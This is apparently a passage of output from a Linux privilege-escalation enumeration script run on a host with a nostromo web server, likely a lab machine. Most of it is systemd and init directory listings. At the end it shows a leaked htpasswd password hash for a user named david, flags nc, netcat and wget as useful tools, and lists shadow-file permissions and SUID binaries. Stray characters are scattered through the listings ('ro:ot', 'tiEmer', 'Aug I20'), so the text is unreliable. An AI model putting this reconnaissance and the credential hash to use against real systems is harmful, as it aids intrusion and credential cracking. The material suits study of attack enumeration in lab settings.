-rwxr-xr-x 1 root root 4445 Aug 25 2018 networking
-rwxr-xr-x 1 root root 924 May 31 2018 procps
-rwxr-xr-x 1 root root 2864 Feb 26 2019 rsyslog
-rwxr-xr-x 1 root root 3939 Oct 5 2019 ssh
-rwxr-xr-x 1 root root 1030 Oct 12 2019 sudo
-rwxr-xr-x 1 root root 6872 May 24 2019 udev
-rwxr-xr-x 1 root root 45893 Nov 12 2019 vmware-tools

[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 8.1M
drwxr-xr-x 19 root root 36K Oct 25 2019 system
drwxr-xr-x 3 root root 4.0K Oct 25 2019 user
drwxr-xr-x 2 root root 4.0K Oct 25 2019 system-sleep
drwxr-xr-x 2 root root 4.0K Oct 25 2019 network
drwxr-xr-x 2 root root 4.0K Oct 25 2019 catalog
drwxr-xr-x 2 root root 4.0K Oct 25 2019 system-generators
drwxr-xr-x 2 root root 4.0K Oct 25 2019 system-preset
drwxr-xr-x 2 root root 4.0K Oct 25 2019 user-environment-generators
drwxr-xr-x 2 root root 4.0K Oct 25 2019 user-preset
drwxr-xr-x 3 root root 4.0K Oct 25 2019 boot
-rw-r--r-- 1 root root 2.6M Aug 20 2019 libsystemd-shared-241.so
-rwxr-xr-x 1 root root 1.5M Aug 20 2019 systemd
-rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-ac-power
-rwxr-xr-x 1 root root 22K Aug 20 2019 systemd-backlight
-rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-binfmt
-rwxr-xr-x 1
root root 27K Aug 20 2019 systemd-bless-boot
-rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-boot-check-no-failures
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-cgroups-agent
-rwxr-xr-x 1 root root 31K Aug 20 2019 systemd-cryptsetup
-rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-dissect
-rwxr-xr-x 1 root root 26K Aug 20 2019 systemd-fsck
-rwxr-xr-x 1 root root 27K Aug 20 2019 systemd-fsckd
-rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-growfs
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-hibernate-resume
-rwxr-xr-x 1 root root 31K Aug 20 2019 systemd-hostnamed
-rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-initctl
-rwxr-xr-x 1 root root 143K Aug 20 2019 systemd-journald
-rwxr-xr-x 1 root root 39K Aug 20 2019 systemd-localed
-rwxr-xr-x 1 root root 227K Aug 20 2019 systemd-logind
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-makefs
-rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-modules-load
-rwxr-xr-x 1 root root 1.8M Aug 20 2019 systemd-networkd
-rwxr-xr-x 1 root root 27K Aug 20 2019 systemd-networkd-wait-online
-rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-quotacheck
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-random-seed
-rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-remount-fs
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-reply-password
-rwxr-xr-x 1 root root 399K Aug 20 2019 systemd-resolved
-rwxr-xr-x 1 root root 23K Aug 20 2019 systemd-rfkill
-rwxr-xr-x 1 root root 51K Aug 20 2019 systemd-shutdown
-rwxr-xr-x 1 root root 27K Aug 20 2019 systemd-sleep
-rwxr-xr-x 1 root root 31K Aug 20 2019 systemd-socket-proxyd
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-sulogin-shell
-rwxr-xr-x 1 root root 23K Aug 20 2019 systemd-sysctl
-rwxr-xr-x 1 root root 1.4K Aug 20 2019 systemd-sysv-install
-rwxr-xr-x 1 root root 39K Aug 20 2019 systemd-timedated
-rwxr-xr-x 1 root root 55K Aug 20 2019 systemd-timesyncd
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-time-wait-sync
-rwxr-xr-x 1 root root 663K Aug 20 2019 systemd-udevd
-rwxr-xr-x 1 root root 15K Aug 20 2019
systemd-update-utmp
-rwxr-xr-x 1 root root 18K Aug 20 2019 systemd-user-runtime-dir
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-user-sessions
-rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-veritysetup
-rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-volatile-root
drwxr-xr-x 2 root root 4.0K May 24 2019 system-shutdown
drwxr-xr-x 2 root root 4.0K May 24 2019 user-generators
-rw-r--r-- 1 root root 692 Feb 14 2019 resolv.conf

/lib/systemd/system:
total 744K
drwxr-xr-x 2 root root 4.0K Oct 25 2019 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Oct 25 2019 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Oct 25 2019 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Oct 25 2019 getty.target.wants
drwxr-xr-x 2 root root 4.0K Oct 25 2019 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Oct 25 2019 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Oct 25 2019 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Oct 25 2019 timers.target.wants
drwxr-xr-x 2 root root 4.0K Oct 25 2019 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Oct 25 2019 systemd-resolved.service.d
drwxr-xr-x 2 root root 4.0K Oct 25 2019 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4.0K Oct 25 2019 user-.slice.d
lrwxrwxrwx 1 root root 9 Oct 12 2019 sudo.service -> /dev/null
-rw-r--r-- 1 root root 184 Oct 5 2019 rescue-ssh.target
-rw-r--r-- 1 root root 538 Oct 5 2019 ssh.service
-rw-r--r-- 1 root root 289 Oct 5 2019 ssh@.service
-rw-r--r-- 1 root root 216 Oct 5 2019 ssh.socket
lrwxrwxrwx 1 root root 14 Aug 20 2019 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root 9 Aug 20 2019 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 checkroot.service -> /dev/null
-rw-r--r-- 1 root root 1.1K Aug 20 2019
console-getty.service
-rw-r--r-- 1 root root 1.3K Aug 20 2019 container-getty@.service
lrwxrwxrwx 1 root root 9 Aug 20 2019 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 Aug 20 2019 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 Aug 20 2019 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 Aug 20 2019 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Aug 20 2019 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 25 Aug 20 2019 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Aug 20 2019 debug-shell.service
lrwxrwxrwx 1 root root 16 Aug 20 2019 default.target -> graphical.target
-rw-r--r-- 1 root root 797 Aug 20 2019 emergency.service
-rw-r--r-- 1 root root 2.0K Aug 20 2019 getty@.service
-rw-r--r-- 1 root root 342 Aug 20 2019 getty-static.service
lrwxrwxrwx 1 root root 9 Aug 20 2019 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 hwclock.service -> /dev/null
-rw-r--r-- 1 root root 670 Aug 20 2019 initrd-cleanup.service
-rw-r--r-- 1 root root 830 Aug 20 2019 initrd-parse-etc.service
-rw-r--r-- 1 root root 589 Aug 20 2019 initrd-switch-root.service
-rw-r--r-- 1 root root 704 Aug 20 2019 initrd-udevadm-cleanup-db.service
lrwxrwxrwx 1 root root 9 Aug 20 2019 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root 28 Aug 20 2019 kmod.service -> systemd-modules-load.service
-rw-r--r-- 1 root root 717 Aug 20 2019 kmod-static-nodes.service
lrwxrwxrwx 1 root root 28 Aug 20 2019 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Aug 20 2019 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 20 2019 mountall.service ->
/dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountnfs.service -> /dev/null lrwxrwxrwx 1 root root 22 Aug 20 2019 procps.service -> systemd-sysctl.service -rw-r--r-- 1 root ro:ot 609 Aug 20 2019 quotaon.service -rw-r--r-- 1 root root 716 Aug 20 2019 rc-local.service lrwxrwxrwx 1 root root 16 Aug 20 2019 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Aug 20 2019 rc.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 rcS.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 reboot.service -> /dev/null -rw-r--r-- 1 root root 788 Aug 20 2019 rescue.service lrwxrwxrwx 1 root root 9 Aug 20 2019 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Aug 20 2019 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Aug 20 2019 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Aug 20 2019 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Aug 20 2019 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Aug 20 2019 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Aug 20 2019 runlevel5.target -> graphical.target lrwxrwxrwx 1 root r;oot 13 Aug 20 2019 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Aug 20 2019 sendsigs.service -> /dev/null -rw-r--r-- 1 root root 1.5K Aug 20 2019 serial-getty@.service lrwxrwxrwx 1 root root 9 Aug 20 2019 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 stop-bootlogd-single.service -> /dev/null -rw-r--r-- 1 root root 742 Aug 20 2019 systemd-ask-password-console.service -rw-r--r-- 1 root root 752 Aug 20 2019 systemd-ask-password-wall.service -rw-r--r-- 1 root root 752 Aug 20 2019 systemd-backlight@.service -rw-r--r-- 1 root root 1.1K Aug 20 2019 
systemd-binfmt.service -rw-r--r-- 1 root root 678 Aug 20 2019 systemd-bless-boot.service -rw-r--r-- 1 root root 718 Aug 20 2019 systemd-boot-check-no-failures.service -rw-r--r-- 1 root root 551 Aug 20 2019 systemd-fsckd.service -rw-r--r-- 1 root root 540 Aug 20 2019 systemd-fsckd.socket -rw-r--r-- 1 root root 740 Ag 20 2019 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 732 Aug 20 2019 systemd-tmpfiles-setup-dev.service -rw-r--r-- 1 root root 772 Aug 20 2019 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 986 Aug 20 2019 systemd-udevd.service -rw-r--r-- 1 root root 863 Aug 20 2019 systemd-udev-settle.service -rw-r--r-- 1 root root 763 Aug 20 2019 systemd-udev-trigger.service -rw-r--r-- 1 root root 797 Aug 20 2019 systemd-update-utmp-runlevel.service -rw-r--r-- 1 root root 794 Aug 20 2019 systemd-update-utmp.service -rw-r--r-- 1 root root 628 Aug 20 2019 systemd-user-sessions.service -rw-r--r-- 1 root root 690 Aug 20 2019 systemd-volatile-root.service lrwxrwxrwx 1 root root 21 Aug 20 2019 udev.service -> systemd-udevd.service lrwxrwxrwx 1 root root 9 Aug 20 2019 umountfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 umountnfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 umountroot.service -> /dev/null lrwxrwxrwx 1 root root 27 Aug ?20 2019 urandom.service -> systemd-random-seed.service -rw-r--r-- 1 root root 688 Aug 20 2019 user-runtime-dir@.service -rw-r--r-- 1 root root 729 Aug 20 2019 user@.service lrwxrwxrwx 1 root root 9 Aug 20 2019 x11-common.service -> /dev/null -rw-r--r-- 1 root root 316 Jun 23 2019 cron.service -rw-r--r-- 1 root root 380 Jun 9 2019 dbus.service -rw-r--r-- 1 root root 106 Jun 9 2019 dbus.socket -rw-r--r-- 1 root root 326 May 28 2019 apt-daily.service -rw-r--r-- 1 root root 156 May 28 2019 apt-daily.timer -rw-r--r-- 1 root root 389 May 28 2019 apt-daily-upgrade.service -rw-r--r-- 1 root root 184 May 28 2019 apt-daily-upgrade.timer drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel1.target.wants drwxr-xr-x 2 
root root 4.0K May 24 2019 runlevel2.target.wants drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel3.target.wants drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel4.target.wants drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel5.target.wants -rw-r--r-- 1 root root 1.2K Mar 30@ 2019 apparmor.service -rw-r--r-- 1 root root 435 Feb 26 2019 rsyslog.service -rw-r--r-- 1 root root 919 Feb 14 2019 basic.target -rw-r--r-- 1 root root 419 Feb 14 2019 bluetooth.target -rw-r--r-- 1 root root 455 Feb 14 2019 boot-complete.target -rw-r--r-- 1 root root 465 Feb 14 2019 cryptsetup-pre.target -rw-r--r-- 1 root root 412 Feb 14 2019 cryptsetup.target -rw-r--r-- 1 root root 750 Feb 14 2019 dev-hugepages.mount -rw-r--r-- 1 root root 665 Feb 14 2019 dev-mqueue.mount -rw-r--r-- 1 root root 471 Feb 14 2019 emergency.target -rw-r--r-- 1 root root 541 Feb 14 2019 exit.target -rw-r--r-- 1 root root 480 Feb 14 2019 final.target -rw-r--r-- 1 root root 506 Feb 14 2019 getty-pre.target -rw-r--r-- 1 root root 500 Feb 14 2019 getty.target -rw-r--r-- 1 root root 598 Feb 14 2019 graphical.target -rw-r--r-- 1 root root 527 Feb 14 2019 halt.target -rw-r--r-- 1 root root 509 Feb 14 2019 hibernate.target -rw-r--r-- 1 root root 530 Feb 14 2019 hybrid-sleep.target -rw-r--r-- 1 rootA root 593 Feb 14 2019 initrd-fs.target -rw-r--r-- 1 root root 561 Feb 14 2019 initrd-root-device.target -rw-r--r-- 1 root root 566 Feb 14 2019 initrd-root-fs.target -rw-r--r-- 1 root root 777 Feb 14 2019 initrd-switch-root.target -rw-r--r-- 1 root root 763 Feb 14 2019 initrd.target -rw-r--r-- 1 root root 541 Feb 14 2019 kexec.target -rw-r--r-- 1 root root 435 Feb 14 2019 local-fs-pre.target -rw-r--r-- 1 root root 547 Feb 14 2019 local-fs.target -rw-r--r-- 1 root root 445 Feb 14 2019 machine.slice -rw-r--r-- 1 root root 532 Feb 14 2019 multi-user.target -rw-r--r-- 1 root root 505 Feb 14 2019 network-online.target -rw-r--r-- 1 root root 502 Feb 14 2019 network-pre.target -rw-r--r-- 1 root root 521 Feb 14 2019 network.target 
-rw-r--r-- 1 root root 554 Feb 14 2019 nss-lookup.target -rw-r--r-- 1 root root 513 Feb 14 2019 nss-user-lookup.target -rw-r--r-- 1 root root 394 Feb 14 2019 paths.target -rw-r--r-- 1 root root 592 Feb 14 2019 poweroff.target -rw-r--r-- 1 root root 417 BFeb 14 2019 printer.target -rw-r--r-- 1 root root 745 Feb 14 2019 proc-sys-fs-binfmt_misc.automount -rw-r--r-- 1 root root 655 Feb 14 2019 proc-sys-fs-binfmt_misc.mount -rw-r--r-- 1 root root 583 Feb 14 2019 reboot.target -rw-r--r-- 1 root root 549 Feb 14 2019 remote-cryptsetup.target -rw-r--r-- 1 root root 436 Feb 14 2019 remote-fs-pre.target -rw-r--r-- 1 root root 522 Feb 14 2019 remote-fs.target -rw-r--r-- 1 root root 492 Feb 14 2019 rescue.target -rw-r--r-- 1 root root 540 Feb 14 2019 rpcbind.target -rw-r--r-- 1 root root 442 Feb 14 2019 shutdown.target -rw-r--r-- 1 root root 402 Feb 14 2019 sigpwr.target -rw-r--r-- 1 root root 460 Feb 14 2019 sleep.target -rw-r--r-- 1 root root 449 Feb 14 2019 slices.target -rw-r--r-- 1 root root 420 Feb 14 2019 smartcard.target -rw-r--r-- 1 root root 396 Feb 14 2019 sockets.target -rw-r--r-- 1 root root 420 Feb 14 2019 sound.target -rw-r--r-- 1 root root 503 Feb 14 2019 suspend.target -rw-r--r-- 1 root root 577 Feb 14 2019 suspend-Cthen-hibernate.target -rw-r--r-- 1 root root 393 Feb 14 2019 swap.target -rw-r--r-- 1 root root 795 Feb 14 2019 sys-fs-fuse-connections.mount -rw-r--r-- 1 root root 558 Feb 14 2019 sysinit.target -rw-r--r-- 1 root root 767 Feb 14 2019 sys-kernel-config.mount -rw-r--r-- 1 root root 710 Feb 14 2019 sys-kernel-debug.mount -rw-r--r-- 1 root root 1.4K Feb 14 2019 syslog.socket -rw-r--r-- 1 root root 722 Feb 14 2019 systemd-ask-password-console.path -rw-r--r-- 1 root root 650 Feb 14 2019 systemd-ask-password-wall.path -rw-r--r-- 1 root root 556 Feb 14 2019 systemd-exit.service -rw-r--r-- 1 root root 546 Feb 14 2019 systemd-initctl.socket -rw-r--r-- 1 root root 647 Feb 14 2019 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.2K Feb 14 2019 
systemd-journald-dev-log.socket -rw-r--r-- 1 root root 882 Feb 14 2019 systemd-journald.socket -rw-r--r-- 1 root root 631 Feb 14 2019 systemd-networkd.socket -rw-r--r-- 1 root root 556 Feb 14 2019 systemd-poweroff.service -rw-r--r-- 1 root rooDt 551 Feb 14 2019 systemd-reboot.service -rw-r--r-- 1 root root 726 Feb 14 2019 systemd-rfkill.socket -rw-r--r-- 1 root root 490 Feb 14 2019 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 635 Feb 14 2019 systemd-udevd-control.socket -rw-r--r-- 1 root root 610 Feb 14 2019 systemd-udevd-kernel.socket -rw-r--r-- 1 root root 1.4K Feb 14 2019 system-update-cleanup.service -rw-r--r-- 1 root root 543 Feb 14 2019 system-update-pre.target -rw-r--r-- 1 root root 617 Feb 14 2019 system-update.target -rw-r--r-- 1 root root 445 Feb 14 2019 timers.target -rw-r--r-- 1 root root 435 Feb 14 2019 time-sync.target -rw-r--r-- 1 root root 457 Feb 14 2019 umount.target -rw-r--r-- 1 root root 432 Feb 14 2019 user.slice -rw-r--r-- 1 root root 482 Feb 10 2019 man-db.service -rw-r--r-- 1 root root 164 Feb 10 2019 man-db.timer -rw-r--r-- 1 root root 440 Feb 8 2019 netfilter-persistent.service -rw-r--r-- 1 root root 151 Jan 10 2019 fstrim.service -rw-r--r-- 1 root root 170 Jan 10 2019 fstrim.tiEmer -rw-r--r-- 1 root root 695 Aug 28 2018 logrotate.service -rw-r--r-- 1 root root 442 Aug 25 2018 ifupdown-pre.service -rw-r--r-- 1 root root 279 Aug 25 2018 ifupdown-wait-online.service -rw-r--r-- 1 root root 552 Aug 25 2018 ifup@.service -rw-r--r-- 1 root root 643 Aug 25 2018 networking.service -rw-r--r-- 1 root root 192 Jan 4 2018 logrotate.timer -rw-r--r-- 1 root root 312 Oct 9 2016 console-setup.service -rw-r--r-- 1 root root 287 Oct 9 2016 keyboard-setup.service /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 15 Aug 20 2019 getty.target -> ../getty.target lrwxrwxrwx 1 root root 33 Aug 20 2019 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx 1 root root 25 Aug 20 2019 systemd-logind.service -> 
../systemd-logind.service lrwxrwxrwx 1 root root 39 Aug 20 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 32 Aug 20 2019 systemd-user-sessions.service -&gFt; ../systemd-user-sessions.service lrwxrwxrwx 1 root root 15 Jun 9 2019 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 25 Aug 20 2019 systemd-initctl.socket -> ../systemd-initctl.socket lrwxrwxrwx 1 root root 32 Aug 20 2019 systemd-journald-audit.socket -> ../systemd-journald-audit.socket lrwxrwxrwx 1 root root 34 Aug 20 2019 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket lrwxrwxrwx 1 root root 26 Aug 20 2019 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx 1 root root 31 Aug 20 2019 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lrwxrwxrwx 1 root root 30 Aug 20 2019 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx 1 root root 14 Jun 9 2019 dbus.socket -> ../dbus.socket /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx 1 root root 20 Aug 20 2019 cryptsetup.target -> ../cryptsetup.target lrwxrwxrwx 1 root root 22 Aug 20G 2019 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx 1 root root 19 Aug 20 2019 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx 1 root root 28 Aug 20 2019 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx 1 root root 36 Aug 20 2019 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx 1 root root 32 Aug 20 2019 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx 1 root root 26 Aug 20 2019 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx 1 root root 25 Aug 20 2019 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx 1 root root 36 Aug 20 2019 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx 1 root root 25 Aug 20 2019 systemd-binfmt.service -> 
../systemd-binfmt.service lrwxrwxrwx 1 root root 30 Aug 20 2019 systemd-hwdb-update.service -> ../systemd-hwdb-update.service lrwxrwxrwx 1 root root 27 Aug 20 2019 systemd-journalHd.service -> ../systemd-journald.service lrwxrwxrwx 1 root root 32 Aug 20 2019 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx 1 root root 36 Aug 20 2019 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service lrwxrwxrwx 1 root root 31 Aug 20 2019 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx 1 root root 30 Aug 20 2019 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx 1 root root 25 Aug 20 2019 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx 1 root root 27 Aug 20 2019 systemd-sysusers.service -> ../systemd-sysusers.service lrwxrwxrwx 1 root root 37 Aug 20 2019 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx 1 root root 33 Aug 20 2019 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx 1 root root 24 Aug 20 2019 systemd-udevd.service -> ../systemd-udevd.service lrwxrwxrwx 1 root root 31 Aug I20 2019 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx 1 root root 30 Aug 20 2019 systemd-update-utmp.service -> ../systemd-update-utmp.service /lib/systemd/system/getty.target.wants: total 0 lrwxrwxrwx 1 root root 23 Aug 20 2019 getty-static.service -> ../getty-static.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx 1 root root 39 Aug 20 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx 1 root root 29 Aug 20 2019 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx 1 root root 39 Aug 20 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/timers.target.wants: 
total 0 lrwxrwxrwx 1 root root 31 Aug 20 2019 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer /lib/systemd/system/rc-local.service.d: totJal 4.0K -rw-r--r-- 1 root root 290 Aug 20 2019 debian.conf /lib/systemd/system/systemd-resolved.service.d: total 4.0K -rw-r--r-- 1 root root 551 Aug 20 2019 resolvconf.conf /lib/systemd/system/systemd-timesyncd.service.d: total 4.0K -rw-r--r-- 1 root root 251 Aug 20 2019 disable-with-time-daemon.conf /lib/systemd/system/user-.slice.d: total 4.0K -rw-r--r-- 1 root root 486 Feb 14 2019 10-defaults.conf /lib/systemd/system/runlevel1.target.wants: total 0 /lib/systemd/system/runlevel2.target.wants: total 0 /lib/systemd/system/runlevel3.target.wants: total 0 /lib/systemd/system/runlevel4.target.wants: total 0 /lib/systemd/system/runlevel5.target.wants: total 0 /lib/systemd/user: total 76K drwxr-xr-x 2 root root 4.0K Oct 25 2019 graphical-session-pre.target.wants -rw-r--r-- 1 root root 287 Oct 5 2019 ssh-agent.service -rw-r--r-- 1 root root 546 Aug 20 2019 graphical-session-pre.target -rw-r--r-- 1 root root 657 Aug 20 2019 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 720 Aug 20 2K019 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 497 Feb 14 2019 basic.target -rw-r--r-- 1 root root 419 Feb 14 2019 bluetooth.target -rw-r--r-- 1 root root 454 Feb 14 2019 default.target -rw-r--r-- 1 root root 502 Feb 14 2019 exit.target -rw-r--r-- 1 root root 484 Feb 14 2019 graphical-session.target -rw-r--r-- 1 root root 394 Feb 14 2019 paths.target -rw-r--r-- 1 root root 417 Feb 14 2019 printer.target -rw-r--r-- 1 root root 442 Feb 14 2019 shutdown.target -rw-r--r-- 1 root root 420 Feb 14 2019 smartcard.target -rw-r--r-- 1 root root 396 Feb 14 2019 sockets.target -rw-r--r-- 1 root root 420 Feb 14 2019 sound.target -rw-r--r-- 1 root root 500 Feb 14 2019 systemd-exit.service -rw-r--r-- 1 root root 533 Feb 14 2019 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 445 Feb 14 2019 timers.target 
/lib/systemd/user/graphical-session-pre.target.wants: total 0 lrwxrwxrwx 1 root root 20 Oct 6 2019 ssh-agent.service -> ../ssh-agent.service /lib/systemd/system-sleep: tLotal 4.0K -rwxr-xr-x 1 root root 92 Oct 26 2018 hdparm /lib/systemd/network: total 16K -rw-r--r-- 1 root root 645 Feb 14 2019 80-container-host0.network -rw-r--r-- 1 root root 718 Feb 14 2019 80-container-ve.network -rw-r--r-- 1 root root 704 Feb 14 2019 80-container-vz.network -rw-r--r-- 1 root root 417 Feb 14 2019 99-default.link /lib/systemd/catalog: total 156K -rw-r--r-- 1 root root 13K Aug 20 2019 systemd.be.catalog -rw-r--r-- 1 root root 9.8K Aug 20 2019 systemd.be@latin.catalog -rw-r--r-- 1 root root 14K Aug 20 2019 systemd.bg.catalog -rw-r--r-- 1 root root 14K Aug 20 2019 systemd.catalog -rw-r--r-- 1 root root 472 Aug 20 2019 systemd.de.catalog -rw-r--r-- 1 root root 13K Aug 20 2019 systemd.fr.catalog -rw-r--r-- 1 root root 11K Aug 20 2019 systemd.it.catalog -rw-r--r-- 1 root root 14K Aug 20 2019 systemd.pl.catalog -rw-r--r-- 1 root root 8.2K Aug 20 2019 systemd.pt_BR.catalog -rw-r--r-- 1 root root 20K Aug 20 2019 systemd.ru.catalog -rw-r--r-- 1 root root 7.2K Aug 20 2019M systemd.zh_CN.catalog -rw-r--r-- 1 root root 7.1K Aug 20 2019 systemd.zh_TW.catalog /lib/systemd/system-generators: total 268K -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-bless-boot-generator -rwxr-xr-x 1 root root 31K Aug 20 2019 systemd-cryptsetup-generator -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-debug-generator -rwxr-xr-x 1 root root 39K Aug 20 2019 systemd-fstab-generator -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-getty-generator -rwxr-xr-x 1 root root 30K Aug 20 2019 systemd-gpt-auto-generator -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-hibernate-resume-generator -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-rc-local-generator -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-run-generator -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-system-update-generator -rwxr-xr-x 1 root root 35K Aug 20 2019 
### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.27

[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1395 Oct 25 2019 /etc/passwd
-rw-r--r-- 1 root root 708 Oct 25 2019 /etc/group
-rw-r--r-- 1 root root 767 Mar 4 2016 /etc/profile
-rw-r----- 1 root shadow 940 Oct 27 2019 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 436552 Oct 6 2019 /usr/lib/openssh/ssh-keysign
